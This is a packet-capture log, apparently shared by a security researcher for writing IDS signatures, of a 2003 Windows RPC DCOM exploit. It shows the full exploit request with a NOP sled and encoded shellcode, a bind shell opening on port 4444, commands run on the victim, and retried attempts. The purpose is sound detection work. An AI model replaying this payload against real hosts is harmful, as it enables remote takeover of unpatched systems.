Local analisys of RPC Exploit in progress

captured on the vunerable host ( 192.168.0.4 ) 
attacking via ( 192.168.0.2 ) 

this is a full, in progress capture for the use of 
configuring IDS signatures.

strings of note:
----------------
1. MEOW
  
2. \ \ F X N B F X F X N B F X F X F X F X


3. C $ \ 1 2 3 4 5 6 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 . d o c


below is the full output, less a snip from a "dir" command
to show the interaction with the shell.

Donnie Werner
http://e2-labs.com
http://exploitlabs.com


===================== rpc-dump.log =============================================


[02:51:29.598 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3111 -> 192.168.0.4:135 

00000000 45 00 00 34 10 8d 40 00 80 06 68 e0 c0 a8 00 02 E  4@ €hàÀ¨ 
00000010 c0 a8 00 04 0c 27 00 87 83 02 43 15 00 00 00 00 À¨  ' ‡ƒC    
00000020 80 02 7f ff 9a fc 00 00 02 04 05 b4 01 03 03 00 €ÿšü  ´ 
00000030 01 01 04 02                                     

[02:51:29.598 - 30.07.2003]
Proto: TCP len: 52 192.168.0.4:135 -> 192.168.0.2:3111 

00000000 45 00 00 34 07 3f 40 00 80 06 72 2e c0 a8 00 04 E  4 ?@ €r.À¨ 
00000010 c0 a8 00 02 00 87 0c 27 75 23 dd 80 83 02 43 16 À¨  ‡ 'u#Ý€ƒC
00000020 80 12 fa f0 cd 55 00 00 02 04 05 b4 01 03 03 00 €úðÍU  ´ 
00000030 01 01 04 02                                     

[02:51:29.608 - 30.07.2003]
Proto: TCP len: 112 192.168.0.2:3111 -> 192.168.0.4:135 

00000000 45 00 00 70 10 8f 40 00 80 06 68 a2 c0 a8 00 02 E  p@ €h¢À¨ 
00000010 c0 a8 00 04 0c 27 00 87 83 02 43 16 75 23 dd 81 À¨  ' ‡ƒCu#Ý
00000020 50 18 7f ff 3f d9 00 00 05 00 0b 03 10 00 00 00 Pÿ?Ù       
00000030 48 00 00 00 7f 00 00 00 d0 16 d0 16 00 00 00 00 H      ÐÐ    
00000040 01 00 00 00 01 00 01 00 a0 01 00 00 00 00 00 00             
00000050 c0 00 00 00 00 00 00 46 00 00 00 00 04 5d 88 8a À      F    ]ˆŠ
00000060 eb 1c c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00 ëÉŸè  +H`   

[02:51:29.618 - 30.07.2003]
Proto: TCP len: 100 192.168.0.4:135 -> 192.168.0.2:3111 

00000000 45 00 00 64 07 40 40 00 80 06 71 fd c0 a8 00 04 E  d @@ €qýÀ¨ 
00000010 c0 a8 00 02 00 87 0c 27 75 23 dd 81 83 02 43 5e À¨  ‡ 'u#ÝƒC^
00000020 50 18 fa a8 3e b4 00 00 05 00 0c 03 10 00 00 00 Pú¨>´       
00000030 3c 00 00 00 7f 00 00 00 d0 16 d0 16 89 54 00 00 <      ÐÐ‰T  
00000040 04 00 31 33 35 00 00 00 01 00 00 00 00 00 00 00  135          
00000050 04 5d 88 8a eb 1c c9 11 9f e8 08 00 2b 10 48 60 ]ˆŠëÉŸè  +H`
00000060 02 00 00 00                                        

[02:51:29.618 - 30.07.2003]
Proto: TCP len: 1500 192.168.0.2:3111 -> 192.168.0.4:135 

00000000 45 00 05 dc 10 90 40 00 80 06 63 35 c0 a8 00 02 E Ü@ €c5À¨ 
00000010 c0 a8 00 04 0c 27 00 87 83 02 43 5e 75 23 dd bd À¨  ' ‡ƒC^u#Ý½
00000020 50 10 7f c3 4f f1 00 00 05 00 00 03 10 00 00 00 PÃOñ       
00000030 a8 06 00 00 e5 00 00 00 90 06 00 00 01 00 04 00 ¨  å       
00000040 05 00 06 00 01 00 00 00 00 00 00 00 32 24 58 fd          2$Xý
00000050 cc 45 64 49 b0 70 dd ae 74 2c 96 d2 60 5e 0d 00 ÌEdI°pÝ®t,–Ò`^  
00000060 01 00 00 00 00 00 00 00 70 5e 0d 00 02 00 00 00        p^     
00000070 7c 5e 0d 00 00 00 00 00 10 00 00 00 80 96 f1 f1 |^         €–ññ
00000080 2a 4d ce 11 a6 6a 00 20 af 6e 72 f4 0c 00 00 00 *MÎ¦j  ¯nrô    
00000090 4d 41 52 42 01 00 00 00 00 00 00 00 0d f0 ad ba MARB        ð­º
000000a0 00 00 00 00 a8 f4 0b 00 20 06 00 00 20 06 00 00     ¨ô        
000000b0 4d 45 4f 57 04 00 00 00 a2 01 00 00 00 00 00 00 MEOW   ¢      
000000c0 c0 00 00 00 00 00 00 46 38 03 00 00 00 00 00 00 À      F8      
000000d0 c0 00 00 00 00 00 00 46 00 00 00 00 f0 05 00 00 À      F    ð  
000000e0 e8 05 00 00 00 00 00 00 01 10 08 00 cc cc cc cc è        ÌÌÌÌ
000000f0 c8 00 00 00 4d 45 4f 57 e8 05 00 00 d8 00 00 00 È   MEOWè  Ø   
00000100 00 00 00 00 02 00 00 00 07 00 00 00 00 00 00 00                
00000110 00 00 00 00 00 00 00 00 00 00 00 00 c4 28 cd 00             Ä(Í 
00000120 64 29 cd 00 00 00 00 00 07 00 00 00 b9 01 00 00 d)Í         ¹  
00000130 00 00 00 00 c0 00 00 00 00 00 00 46 ab 01 00 00     À      F«  
00000140 00 00 00 00 c0 00 00 00 00 00 00 46 a5 01 00 00     À      F¥  
00000150 00 00 00 00 c0 00 00 00 00 00 00 46 a6 01 00 00     À      F¦  
00000160 00 00 00 00 c0 00 00 00 00 00 00 46 a4 01 00 00     À      F¤  
00000170 00 00 00 00 c0 00 00 00 00 00 00 46 ad 01 00 00     À      F­  
00000180 00 00 00 00 c0 00 00 00 00 00 00 46 aa 01 00 00     À      Fª  
00000190 00 00 00 00 c0 00 00 00 00 00 00 46 07 00 00 00     À      F    
000001a0 60 00 00 00 58 00 00 00 90 00 00 00 40 00 00 00 `   X      @   
000001b0 20 00 00 00 38 03 00 00 30 00 00 00 01 00 00 00     8  0      
000001c0 01 10 08 00 cc cc cc cc 50 00 00 00 4f b6 88 20   ÌÌÌÌP   O¶ˆ 
000001d0 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 ÿÿÿÿ            
000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00                 
000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00                 
00000200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00                 
00000210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00                 
00000220 01 10 08 00 cc cc cc cc 48 00 00 00 07 00 66 00   ÌÌÌÌH     f 
00000230 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46       À      F
00000240 10 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00               
00000250 00 00 00 00 78 19 0c 00 58 00 00 00 05 00 06 00     x  X     
00000260 01 00 00 00 70 d8 98 93 98 4f d2 11 a9 3d be 57    pØ˜“˜OÒ©=¾W
00000270 b2 00 00 00 32 00 31 00 01 10 08 00 cc cc cc cc ²   2 1   ÌÌÌÌ
00000280 80 00 00 00 0d f0 ad ba 00 00 00 00 00 00 00 00 €    ð­º        
00000290 00 00 00 00 00 00 00 00 18 43 14 00 00 00 00 00         C     
000002a0 60 00 00 00 60 00 00 00 4d 45 4f 57 04 00 00 00 `   `   MEOW   
000002b0 c0 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 À      À      F
000002c0 3b 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 ;      À      F
000002d0 00 00 00 00 30 00 00 00 01 00 01 00 81 c5 17 03     0     Å
000002e0 80 0e e9 4a 99 99 f1 8a 50 6f 7a 85 02 00 00 00 €éJ™™ñŠPoz…   
000002f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00                 
00000300 00 00 00 00 01 00 00 00 01 10 08 00 cc cc cc cc          ÌÌÌÌ
00000310 30 00 00 00 78 00 6e 00 00 00 00 00 d8 da 0d 00 0   x n     ØÚ  
00000320 00 00 00 00 00 00 00 00 20 2f 0c 00 00 00 00 00          /      
00000330 00 00 00 00 03 00 00 00 00 00 00 00 03 00 00 00               
00000340 46 00 58 00 00 00 00 00 01 10 08 00 cc cc cc cc F X       ÌÌÌÌ
00000350 10 00 00 00 30 00 2e 00 00 00 00 00 00 00 00 00    0 .         
00000360 00 00 00 00 00 00 00 00 01 10 08 00 cc cc cc cc           ÌÌÌÌ
00000370 68 00 00 00 0e 00 ff ff 68 8b 0b 00 02 00 00 00 h    ÿÿh‹     
00000380 00 00 00 00 00 00 00 00 86 01 00 00 00 00 00 00         †      
00000390 86 01 00 00 5c 00 5c 00 46 00 58 00 4e 00 42 00 †  \ \ F X N B 
000003a0 46 00 58 00 46 00 58 00 4e 00 42 00 46 00 58 00 F X F X N B F X 
000003b0 46 00 58 00 46 00 58 00 46 00 58 00 e3 af e9 77 F X F X F X ã¯éw
000003c0 cc e0 fd 7f cc e0 fd 7f 90 90 90 90 90 90 90 90 ÌàýÌàý
000003d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
000003e0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
000003f0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
00000400 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
00000410 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
00000420 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
00000430 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
00000440 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
00000450 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
00000460 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 eb ë
00000470 19 5e 31 c9 81 e9 89 ff ff ff 81 36 80 bf 32 94 ^1Éé‰ÿÿÿ6€¿2”
00000480 81 ee fc ff ff ff e2 f2 eb 05 e8 e2 ff ff ff 03 îüÿÿÿâòëèâÿÿÿ
00000490 53 06 1f 74 57 75 95 80 bf bb 92 7f 89 5a 1a ce StWu•€¿»’‰ZÎ
000004a0 b1 de 7c e1 be 32 94 09 f9 3a 6b b6 d7 9f 4d 85 ±Þ|á¾2” ù:k¶×ŸM…
000004b0 71 da c6 81 bf 32 1d c6 b3 5a f8 ec bf 32 fc b3 qÚÆ¿2Æ³Zøì¿2ü³
000004c0 8d 1c f0 e8 c8 41 a6 df eb cd c2 88 36 74 90 7f ðèÈA¦ßëÍÂˆ6t
000004d0 89 5a e6 7e 0c 24 7c ad be 32 94 09 f9 22 6b b6 ‰Zæ~ $|­¾2” ù"k¶
000004e0 d7 4c 4c 62 cc da 8a 81 bf 32 1d c6 ab cd e2 84 ×LLbÌÚŠ¿2Æ«Íâ„
000004f0 d7 f9 79 7c 84 da 9a 81 bf 32 1d c6 a7 cd e2 84 ×ùy|„Úš¿2Æ§Íâ„
00000500 d7 eb 9d 75 12 da 6a 80 bf 32 1d c6 a3 cd e2 84 ×ëuÚj€¿2Æ£Íâ„
00000510 d7 96 8e f0 78 da 7a 80 bf 32 1d c6 9f cd e2 84 ×–ŽðxÚz€¿2ÆŸÍâ„
00000520 d7 96 39 ae 56 da 4a 80 bf 32 1d c6 9b cd e2 84 ×–9®VÚJ€¿2Æ›Íâ„
00000530 d7 d7 dd 06 f6 da 5a 80 bf 32 1d c6 97 cd e2 84 ××ÝöÚZ€¿2Æ—Íâ„
00000540 d7 d5 ed 46 c6 da 2a 80 bf 32 1d c6 93 01 6b 01 ×ÕíFÆÚ*€¿2Æ“k
00000550 53 a2 95 80 bf 66 fc 81 be 32 94 7f e9 2a c4 d0 S¢•€¿fü¾2”é*ÄÐ
00000560 ef 62 d4 d0 ff 62 6b d6 a3 b9 4c d7 e8 5a 96 80 ïbÔÐÿbkÖ£¹L×èZ–€
00000570 ae 6e 1f 4c d5 24 c5 d3 40 64 b4 d7 ec cd c2 a4 ®nLÕ$ÅÓ@d´×ìÍÂ¤
00000580 e8 63 c7 7f e9 1a 1f 50 d7 57 ec e5 bf 5a f7 ed ècÇéP×Wìå¿Z÷í
00000590 db 1c 1d e6 8f b1 78 d4 32 0e b0 b3 7f 01 5d 03 Ûæ±xÔ2°³]
000005a0 7e 27 3f 62 42 f4 d0 a4 af 76 6a c4 9b 0f 1d d4 ~'?bBôÐ¤¯vjÄ›Ô
000005b0 9b 7a 1d d4 9b 7e 1d d4 9b 62 19 c4 9b 22 c0 d0 ›zÔ›~Ô›bÄ›"ÀÐ
000005c0 ee 63 c5 ea be 63 c5 7f c9 02 c5 7f e9 22 1f 4c îcÅê¾cÅÉÅé"L
000005d0 d5 cd 6b b1 40 64 98 0b 77 65 6b d6             ÕÍk±@d˜ wekÖ

[02:51:29.648 - 30.07.2003]
Proto: TCP len: 284 192.168.0.2:3111 -> 192.168.0.4:135 

00000000 45 00 01 1c 10 91 40 00 80 06 67 f4 c0 a8 00 02 E ‘@ €gôÀ¨ 
00000010 c0 a8 00 04 0c 27 00 87 83 02 49 12 75 23 dd bd À¨  ' ‡ƒIu#Ý½
00000020 50 18 7f c3 e4 61 00 00 93 cd c2 94 ea 64 f0 21 PÃäa  “ÍÂ”êdð!
00000030 8f 32 94 80 3a f2 ec 8c 34 72 98 0b cf 2e 39 0b 2”€:òìŒ4r˜ Ï.9 
00000040 d7 3a 7f 89 34 72 a0 0b 17 8a 94 80 bf b9 51 de ×:‰4r  Š”€¿¹QÞ
00000050 e2 f0 90 80 ec 67 c2 d7 34 5e b0 98 34 77 a8 0b âð€ìgÂ×4^°˜4w¨ 
00000060 eb 37 ec 83 6a b9 de 98 34 68 b4 83 62 d1 a6 c9 ë7ìƒj¹Þ˜4h´ƒbÑ¦É
00000070 34 06 1f 83 4a 01 6b 7c 8c f2 38 ba 7b 46 93 41 4ƒJk|Œò8º{F“A
00000080 70 3f 97 78 54 c0 af fc 9b 26 e1 61 34 68 b0 83 p?—xTÀ¯ü›&áa4h°ƒ
00000090 62 54 1f 8c f4 b9 ce 9c bc ef 1f 84 34 31 51 6b bTŒô¹Îœ¼ï„41Qk
000000a0 bd 01 54 0b 6a 6d ca dd e4 f0 90 80 2f a2 04 00 ½T jmÊÝäð€/¢ 
000000b0 5c 00 43 00 24 00 5c 00 31 00 32 00 33 00 34 00 \ C $ \ 1 2 3 4 
000000c0 35 00 36 00 31 00 31 00 31 00 31 00 31 00 31 00 5 6 1 1 1 1 1 1 
000000d0 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1 1 1 1 1 1 1 1 
000000e0 31 00 2e 00 64 00 6f 00 63 00 00 00 01 10 08 00 1 . d o c     
000000f0 cc cc cc cc 20 00 00 00 30 00 2d 00 00 00 00 00 ÌÌÌÌ    0 -     
00000100 88 2a 0c 00 02 00 00 00 01 00 00 00 28 8c 0c 00 ˆ*        (Œ  
00000110 01 00 00 00 07 00 00 00 00 00 00 00                        

[02:51:29.698 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3112 -> 192.168.0.4:4444 

00000000 45 00 00 34 10 94 40 00 80 06 68 d9 c0 a8 00 02 E  4”@ €hÙÀ¨ 
00000010 c0 a8 00 04 0c 28 11 5c 83 03 24 bd 00 00 00 00 À¨  (\ƒ$½    
00000020 80 02 7f ff a8 7d 00 00 02 04 05 b4 01 03 03 00 €ÿ¨}  ´ 
00000030 01 01 04 02                                     

[02:51:29.698 - 30.07.2003]
Proto: TCP len: 52 192.168.0.4:4444 -> 192.168.0.2:3112 

00000000 45 00 00 34 07 44 40 00 80 06 72 29 c0 a8 00 04 E  4 D@ €r)À¨ 
00000010 c0 a8 00 02 11 5c 0c 28 75 25 10 a9 83 03 24 be À¨ \ (u%©ƒ$¾
00000020 80 12 fa f0 a7 ac 00 00 02 04 05 b4 01 03 03 00 €úð§¬  ´ 
00000030 01 01 04 02                                     

[02:51:29.939 - 30.07.2003]
Proto: TCP len: 79 192.168.0.4:4444 -> 192.168.0.2:3112 

00000000 45 00 00 4f 07 45 40 00 80 06 72 0d c0 a8 00 04 E  O E@ €r À¨ 
00000010 c0 a8 00 02 11 5c 0c 28 75 25 10 aa 83 03 24 be À¨ \ (u%ªƒ$¾
00000020 50 18 fa f0 fd 35 00 00 4d 69 63 72 6f 73 6f 66 Púðý5  Microsof
00000030 74 20 57 69 6e 64 6f 77 73 20 58 50 20 5b 56 65 t Windows XP [Ve
00000040 72 73 69 6f 6e 20 35 2e 31 2e 32 36 30 30 5d    rsion 5.1.2600]

[02:51:30.059 - 30.07.2003]
Proto: TCP len: 105 192.168.0.4:4444 -> 192.168.0.2:3112 

00000000 45 00 00 69 07 46 40 00 80 06 71 f2 c0 a8 00 04 E  i F@ €qòÀ¨ 
00000010 c0 a8 00 02 11 5c 0c 28 75 25 10 d1 83 03 24 be À¨ \ (u%Ñƒ$¾
00000020 50 18 fa f0 53 90 00 00 0d 0a 28 43 29 20 43 6f PúðS    (C) Co
00000030 70 79 72 69 67 68 74 20 31 39 38 35 2d 32 30 30 pyright 1985-200
00000040 31 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 1 Microsoft Corp
00000050 2e 0d 0a 0d 0a 43 3a 5c 57 49 4e 44 4f 57 53 5c .    C:\WINDOWS\
00000060 73 79 73 74 65 6d 33 32 3e                      system32>

[02:51:34.145 - 30.07.2003]
Proto: TCP len: 44 192.168.0.2:3112 -> 192.168.0.4:4444 

00000000 45 00 00 2c 10 99 40 00 80 06 68 dc c0 a8 00 02 E  ,™@ €hÜÀ¨ 
00000010 c0 a8 00 04 0c 28 11 5c 83 03 24 be 75 25 11 12 À¨  (\ƒ$¾u%
00000020 50 18 7f 97 8c e9 00 00 64 69 72 0a             P—Œé  dir 

[02:51:34.145 - 30.07.2003]
Proto: TCP len: 44 192.168.0.4:4444 -> 192.168.0.2:3112 

00000000 45 00 00 2c 07 47 40 00 80 06 72 2e c0 a8 00 04 E  , G@ €r.À¨ 
00000010 c0 a8 00 02 11 5c 0c 28 75 25 11 12 83 03 24 c2 À¨ \ (u%ƒ$Â
00000020 50 18 fa ec 11 90 00 00 64 69 72 0a             Púì  dir 

[02:51:34.205 - 30.07.2003]
Proto: TCP len: 1500 192.168.0.4:4444 -> 192.168.0.2:3112 

00000000 45 00 05 dc 07 48 40 00 80 06 6c 7d c0 a8 00 04 E Ü H@ €l}À¨ 
00000010 c0 a8 00 02 11 5c 0c 28 75 25 11 16 83 03 24 c2 À¨ \ (u%ƒ$Â
00000020 50 18 fa ec 31 65 00 00 20 56 6f 6c 75 6d 65 20 Púì1e   Volume 
00000030 69 6e 20 64 72 69 76 65 20 43 20 68 61 73 20 6e in drive C has n
00000040 6f 20 6c 61 62 65 6c 2e 0d 0a 20 56 6f 6c 75 6d o label.   Volum
00000050 65 20 53 65 72 69 61 6c 20 4e 75 6d 62 65 72 20 e Serial Number 
00000060 69 73 20 44 38 45 38 2d 46 31 43 44 0d 0a 0d 0a is D8E8-F1CD    
00000070 20 44 69 72 65 63 74 6f 72 79 20 6f 66 20 43 3a  Directory of C:
00000080 5c 57 49 4e 44 4f 57 53 5c 73 79 73 74 65 6d 33 \WINDOWS\system3


================================================================


sniped dir of c:\windows\system32

below is the continuance of additional vector tries

================================================================


000000b0 37 32 38 20 78 6f 6c 65 68 6c 70 2e 64 6c 6c 0d 728 xolehlp.dll 
000000c0 0a                                               

[02:51:34.776 - 30.07.2003]
Proto: TCP len: 213 192.168.0.4:4444 -> 192.168.0.2:3112 

00000000 45 00 00 d5 07 e6 40 00 80 06 70 e6 c0 a8 00 04 E  Õ æ@ €pæÀ¨ 
00000010 c0 a8 00 02 11 5c 0c 28 75 26 7c f8 83 03 24 c2 À¨ \ (u&|øƒ$Â
00000020 50 18 fa ec fa fd 00 00 30 38 2f 32 33 2f 32 30 Púìúý  08/23/20
00000030 30 31 20 20 30 35 3a 30 30 20 41 4d 20 20 20 20 01  05:00 AM    
00000040 20 20 20 20 20 20 20 33 31 37 2c 39 35 32 20 7a        317,952 z
00000050 69 70 66 6c 64 72 2e 64 6c 6c 0d 0a 20 20 20 20 ipfldr.dll      
00000060 20 20 20 20 20 20 20 20 31 37 36 37 20 46 69 6c         1767 Fil
00000070 65 28 73 29 20 20 20 20 32 35 39 2c 37 38 33 2c e(s)    259,783,
00000080 37 34 37 20 62 79 74 65 73 0d 0a 20 20 20 20 20 747 bytes       
00000090 20 20 20 20 20 20 20 20 20 34 32 20 44 69 72 28          42 Dir(
000000a0 73 29 20 20 20 20 20 20 38 38 2c 30 33 34 2c 33 s)      88,034,3
000000b0 30 34 20 62 79 74 65 73 20 66 72 65 65 0d 0a 0d 04 bytes free   
000000c0 0a 43 3a 5c 57 49 4e 44 4f 57 53 5c 73 79 73 74  C:\WINDOWS\syst
000000d0 65 6d 33 32 3e                                  em32>

[02:51:40.033 - 30.07.2003]
Proto: TCP len: 45 192.168.0.2:3112 -> 192.168.0.4:4444 

00000000 45 00 00 2d 10 d7 40 00 80 06 68 9d c0 a8 00 02 E  -×@ €hÀ¨ 
00000010 c0 a8 00 04 0c 28 11 5c 83 03 24 c2 75 26 7d a5 À¨  (\ƒ$Âu&}¥
00000020 50 18 7f ff 1d 6f 00 00 65 78 69 74 0a          Pÿo  exit 

[02:51:40.043 - 30.07.2003]
Proto: TCP len: 45 192.168.0.4:4444 -> 192.168.0.2:3112 

00000000 45 00 00 2d 07 e7 40 00 80 06 71 8d c0 a8 00 04 E  - ç@ €qÀ¨ 
00000010 c0 a8 00 02 11 5c 0c 28 75 26 7d a5 83 03 24 c7 À¨ \ (u&}¥ƒ$Ç
00000020 50 18 fa e7 a2 81 00 00 65 78 69 74 0a          Púç¢  exit 

[02:51:40.434 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3113 -> 192.168.0.4:135 

00000000 45 00 00 34 10 d9 40 00 80 06 68 94 c0 a8 00 02 E  4Ù@ €h”À¨ 
00000010 c0 a8 00 04 0c 29 00 87 83 2c ae 6b 00 00 00 00 À¨  ) ‡ƒ,®k    
00000020 80 02 7f ff 2f 7a 00 00 02 04 05 b4 01 03 03 00 €ÿ/z  ´ 
00000030 01 01 04 02                                     

[02:51:40.875 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3113 -> 192.168.0.4:135 

00000000 45 00 00 34 10 da 40 00 80 06 68 93 c0 a8 00 02 E  4Ú@ €h“À¨ 
00000010 c0 a8 00 04 0c 29 00 87 83 2c ae 6b 00 00 00 00 À¨  ) ‡ƒ,®k    
00000020 80 02 7f ff 2f 7a 00 00 02 04 05 b4 01 03 03 00 €ÿ/z  ´ 
00000030 01 01 04 02                                     

[02:51:40.935 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3114 -> 192.168.0.4:4444 

00000000 45 00 00 34 10 db 40 00 80 06 68 92 c0 a8 00 02 E  4Û@ €h’À¨ 
00000010 c0 a8 00 04 0c 2a 11 5c 83 2f 20 18 00 00 00 00 À¨  *\ƒ/     
00000020 80 02 7f ff ac f4 00 00 02 04 05 b4 01 03 03 00 €ÿ¬ô  ´ 
00000030 01 01 04 02                                     

[02:51:41.375 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3114 -> 192.168.0.4:4444 

00000000 45 00 00 34 10 dc 40 00 80 06 68 91 c0 a8 00 02 E  4Ü@ €h‘À¨ 
00000010 c0 a8 00 04 0c 2a 11 5c 83 2f 20 18 00 00 00 00 À¨  *\ƒ/     
00000020 80 02 7f ff ac f4 00 00 02 04 05 b4 01 03 03 00 €ÿ¬ô  ´ 
00000030 01 01 04 02                                     

[02:51:41.445 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3115 -> 192.168.0.4:135 

00000000 45 00 00 34 10 dd 40 00 80 06 68 90 c0 a8 00 02 E  4Ý@ €hÀ¨ 
00000010 c0 a8 00 04 0c 2b 00 87 83 31 fb 45 00 00 00 00 À¨  + ‡ƒ1ûE    
00000020 80 02 7f ff e2 98 00 00 02 04 05 b4 01 03 03 00 €ÿâ˜  ´ 
00000030 01 01 04 02                                     

[02:51:41.876 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3115 -> 192.168.0.4:135 

00000000 45 00 00 34 10 de 40 00 80 06 68 8f c0 a8 00 02 E  4Þ@ €hÀ¨ 
00000010 c0 a8 00 04 0c 2b 00 87 83 31 fb 45 00 00 00 00 À¨  + ‡ƒ1ûE    
00000020 80 02 7f ff e2 98 00 00 02 04 05 b4 01 03 03 00 €ÿâ˜  ´ 
00000030 01 01 04 02                                     

[02:51:41.936 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3116 -> 192.168.0.4:4444 

00000000 45 00 00 34 10 df 40 00 80 06 68 8e c0 a8 00 02 E  4ß@ €hŽÀ¨ 
00000010 c0 a8 00 04 0c 2c 11 5c 83 34 bd 34 00 00 00 00 À¨  ,\ƒ4½4    
00000020 80 02 7f ff 0f d1 00 00 02 04 05 b4 01 03 03 00 €ÿÑ  ´ 
00000030 01 01 04 02                                     

[02:51:42.377 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3116 -> 192.168.0.4:4444 

00000000 45 00 00 34 10 e0 40 00 80 06 68 8d c0 a8 00 02 E  4à@ €hÀ¨ 
00000010 c0 a8 00 04 0c 2c 11 5c 83 34 bd 34 00 00 00 00 À¨  ,\ƒ4½4    
00000020 80 02 7f ff 0f d1 00 00 02 04 05 b4 01 03 03 00 €ÿÑ  ´ 
00000030 01 01 04 02                                     

[02:51:42.447 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3117 -> 192.168.0.4:135 

00000000 45 00 00 34 10 e1 40 00 80 06 68 8c c0 a8 00 02 E  4á@ €hŒÀ¨ 
00000010 c0 a8 00 04 0c 2d 00 87 83 37 61 3e 00 00 00 00 À¨  - ‡ƒ7a>    
00000020 80 02 7f ff 7c 98 00 00 02 04 05 b4 01 03 03 00 €ÿ|˜  ´ 
00000030 01 01 04 02                                     

[02:51:42.877 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3117 -> 192.168.0.4:135 

00000000 45 00 00 34 10 e2 40 00 80 06 68 8b c0 a8 00 02 E  4â@ €h‹À¨ 
00000010 c0 a8 00 04 0c 2d 00 87 83 37 61 3e 00 00 00 00 À¨  - ‡ƒ7a>    
00000020 80 02 7f ff 7c 98 00 00 02 04 05 b4 01 03 03 00 €ÿ|˜  ´ 
00000030 01 01 04 02                                     

[02:51:42.937 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3118 -> 192.168.0.4:4444 

00000000 45 00 00 34 10 e3 40 00 80 06 68 8a c0 a8 00 02 E  4ã@ €hŠÀ¨ 
00000010 c0 a8 00 04 0c 2e 11 5c 83 3a 24 d4 00 00 00 00 À¨  .\ƒ:$Ô    
00000020 80 02 7f ff a8 29 00 00 02 04 05 b4 01 03 03 00 €ÿ¨)  ´ 
00000030 01 01 04 02                                     

[02:51:43.378 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3118 -> 192.168.0.4:4444 

00000000 45 00 00 34 10 e4 40 00 80 06 68 89 c0 a8 00 02 E  4ä@ €h‰À¨ 
00000010 c0 a8 00 04 0c 2e 11 5c 83 3a 24 d4 00 00 00 00 À¨  .\ƒ:$Ô    
00000020 80 02 7f ff a8 29 00 00 02 04 05 b4 01 03 03 00 €ÿ¨)  ´ 
00000030 01 01 04 02                                     

[02:51:43.448 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3119 -> 192.168.0.4:135 

00000000 45 00 00 34 10 e5 40 00 80 06 68 88 c0 a8 00 02 E  4å@ €hˆÀ¨ 
00000010 c0 a8 00 04 0c 2f 00 87 83 3d 06 61 00 00 00 00 À¨  / ‡ƒ=a    
00000020 80 02 7f ff d7 6d 00 00 02 04 05 b4 01 03 03 00 €ÿ×m  ´ 
00000030 01 01 04 02                                     

[02:51:43.879 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3119 -> 192.168.0.4:135 

00000000 45 00 00 34 10 e6 40 00 80 06 68 87 c0 a8 00 02 E  4æ@ €h‡À¨ 
00000010 c0 a8 00 04 0c 2f 00 87 83 3d 06 61 00 00 00 00 À¨  / ‡ƒ=a    
00000020 80 02 7f ff d7 6d 00 00 02 04 05 b4 01 03 03 00 €ÿ×m  ´ 
00000030 01 01 04 02                                     

[02:51:43.939 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3120 -> 192.168.0.4:4444 

00000000 45 00 00 34 10 e7 40 00 80 06 68 86 c0 a8 00 02 E  4ç@ €h†À¨ 
00000010 c0 a8 00 04 0c 30 11 5c 83 3f e1 46 00 00 00 00 À¨  0\ƒ?áF    
00000020 80 02 7f ff eb af 00 00 02 04 05 b4 01 03 03 00 €ÿë¯  ´ 
00000030 01 01 04 02                                     

[02:51:44.380 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3120 -> 192.168.0.4:4444 

00000000 45 00 00 34 10 e8 40 00 80 06 68 85 c0 a8 00 02 E  4è@ €h…À¨ 
00000010 c0 a8 00 04 0c 30 11 5c 83 3f e1 46 00 00 00 00 À¨  0\ƒ?áF    
00000020 80 02 7f ff eb af 00 00 02 04 05 b4 01 03 03 00 €ÿë¯  ´ 
00000030 01 01 04 02                                     

[02:51:44.450 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3121 -> 192.168.0.4:135 

00000000 45 00 00 34 10 e9 40 00 80 06 68 84 c0 a8 00 02 E  4é@ €h„À¨ 
00000010 c0 a8 00 04 0c 31 00 87 83 42 90 b4 00 00 00 00 À¨  1 ‡ƒB´    
00000020 80 02 7f ff 4d 13 00 00 02 04 05 b4 01 03 03 00 €ÿM  ´ 
00000030 01 01 04 02                                     

[02:51:44.880 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3121 -> 192.168.0.4:135 

00000000 45 00 00 34 10 ea 40 00 80 06 68 83 c0 a8 00 02 E  4ê@ €hƒÀ¨ 
